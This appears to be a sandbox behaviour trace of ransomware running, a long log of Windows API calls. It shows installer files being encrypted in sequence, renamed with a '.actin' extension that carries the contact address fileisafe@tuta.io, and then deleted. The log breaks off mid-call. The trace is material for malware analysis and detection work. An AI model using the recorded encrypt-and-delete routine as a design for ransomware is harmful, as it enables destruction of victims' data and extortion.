[0047.099] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x141d0, dwBufLen=0x141d0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x141d0) returned 1 [0047.099] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x141d0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x141d0, lpOverlapped=0x0) returned 1 [0047.102] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71a80) returned 1 [0047.102] CryptSetKeyParam (hKey=0xf71a80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.102] CryptEncrypt (in: hKey=0xf71a80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0047.102] CryptDestroyKey (hKey=0xf71a80) returned 1 [0047.102] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0047.102] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0047.102] CloseHandle (hObject=0x32c) returned 1 [0047.102] CloseHandle (hObject=0x300) returned 1 [0047.104] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml")) returned 1 [0047.105] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0047.105] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0047.105] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=18264) returned 1 [0047.105] CloseHandle (hObject=0x300) returned 1 [0047.105] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll")) returned 0x80 [0047.106] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.106] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0047.106] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.106] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.106] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0047.106] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71d40) returned 1 [0047.106] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.106] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x4758, lpOverlapped=0x0) returned 1 [0047.108] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4760, dwBufLen=0x4760 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4760) returned 1 [0047.108] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x4760, lpOverlapped=0x0) returned 1 [0047.109] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71f40) returned 1 [0047.109] CryptSetKeyParam (hKey=0xf71f40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.109] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0047.109] CryptDestroyKey (hKey=0xf71f40) returned 1 [0047.109] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0047.110] CryptDestroyKey (hKey=0xf71d40) returned 1 [0047.110] CloseHandle (hObject=0x300) returned 1 [0047.110] CloseHandle (hObject=0x32c) returned 1 [0047.111] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll")) returned 1 [0047.112] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0047.112] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0047.112] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=3683) returned 1 [0047.112] CloseHandle (hObject=0x32c) returned 1 [0047.112] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf")) returned 0x80 [0047.112] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.112] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0047.112] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.112] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.112] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0047.305] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72140) returned 1 [0047.305] CryptSetKeyParam (hKey=0xf72140, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.305] ReadFile (in: hFile=0x32c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0xe63, lpOverlapped=0x0) returned 1 [0047.325] CryptEncrypt (in: hKey=0xf72140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xe70, dwBufLen=0xe70 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xe70) returned 1 [0047.325] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xe70, lpOverlapped=0x0) returned 1 [0047.326] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71cc0) returned 1 [0047.326] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.326] CryptEncrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0047.326] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0047.326] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0047.326] CryptDestroyKey (hKey=0xf72140) returned 1 [0047.326] CloseHandle (hObject=0x32c) returned 1 [0047.326] CloseHandle (hObject=0x324) returned 1 [0047.327] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf")) returned 1 [0047.328] SetEvent (hEvent=0x2e8) returned 1 [0047.328] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0047.328] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0047.328] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=18264) returned 1 [0047.328] CloseHandle (hObject=0x324) returned 1 [0047.328] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll")) returned 0x80 [0047.329] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.329] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0047.329] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.329] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.329] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0047.333] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72100) returned 1 [0047.333] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.333] ReadFile (in: hFile=0x324, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x4758, lpOverlapped=0x0) returned 1 [0047.334] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4760, dwBufLen=0x4760 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4760) returned 1 [0047.334] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x4760, lpOverlapped=0x0) returned 1 [0047.336] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71b40) returned 1 [0047.336] CryptSetKeyParam (hKey=0xf71b40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.336] CryptEncrypt (in: hKey=0xf71b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0047.336] CryptDestroyKey (hKey=0xf71b40) returned 1 [0047.336] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0047.336] CryptDestroyKey (hKey=0xf72100) returned 1 [0047.336] CloseHandle (hObject=0x324) returned 1 [0047.336] CloseHandle (hObject=0x32c) returned 1 [0047.337] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll")) returned 1 [0047.338] SetEvent (hEvent=0x2e8) returned 1 [0047.338] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0047.338] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0047.338] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=54456) returned 1 [0047.338] CloseHandle (hObject=0x314) returned 1 [0047.338] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf")) returned 0x80 [0047.339] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.339] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0047.339] SetFilePointerEx (in: hFile=0x314, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.339] SetFilePointerEx (in: hFile=0x314, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.339] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0047.340] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71b80) returned 1 [0047.340] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.340] ReadFile (in: hFile=0x314, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0xd4b8, lpOverlapped=0x0) returned 1 [0047.342] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xd4c0, dwBufLen=0xd4c0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xd4c0) returned 1 [0047.342] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xd4c0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xd4c0, lpOverlapped=0x0) returned 1 [0047.343] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71b40) returned 1 [0047.343] CryptSetKeyParam (hKey=0xf71b40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.344] CryptEncrypt (in: hKey=0xf71b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0047.344] CryptDestroyKey (hKey=0xf71b40) returned 1 [0047.344] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0047.344] CryptDestroyKey (hKey=0xf71b80) returned 1 [0047.344] CloseHandle (hObject=0x314) returned 1 [0047.344] CloseHandle (hObject=0x32c) returned 1 [0047.345] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf")) returned 1 [0047.346] SetEvent (hEvent=0x2e8) returned 1 [0047.346] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0047.347] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0047.347] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=81482) returned 1 [0047.347] CloseHandle (hObject=0x32c) returned 1 [0047.347] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml")) returned 0x80 [0047.347] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.347] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0047.347] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.347] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.347] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0047.347] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72100) returned 1 [0047.347] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.347] ReadFile (in: hFile=0x32c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x13e4a, lpOverlapped=0x0) returned 1 [0047.349] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x13e50, dwBufLen=0x13e50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x13e50) returned 1 [0047.349] WriteFile (in: hFile=0x314, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x13e50, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x13e50, lpOverlapped=0x0) returned 1 [0047.351] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71f40) returned 1 [0047.351] CryptSetKeyParam (hKey=0xf71f40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.351] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0047.351] CryptDestroyKey (hKey=0xf71f40) returned 1 [0047.351] WriteFile (in: hFile=0x314, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0047.351] CryptDestroyKey (hKey=0xf72100) returned 1 [0047.351] CloseHandle (hObject=0x32c) returned 1 [0047.351] CloseHandle (hObject=0x314) returned 1 [0047.353] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml")) returned 1 [0047.355] SetEvent (hEvent=0x2e8) returned 1 [0047.355] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0047.355] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0047.355] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=18264) returned 1 [0047.355] CloseHandle (hObject=0x314) returned 1 [0047.355] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll")) returned 0x80 [0047.355] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.355] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0047.355] SetFilePointerEx (in: hFile=0x314, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.355] SetFilePointerEx (in: hFile=0x314, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.356] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0047.356] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72100) returned 1 [0047.356] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.356] ReadFile (in: hFile=0x314, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, 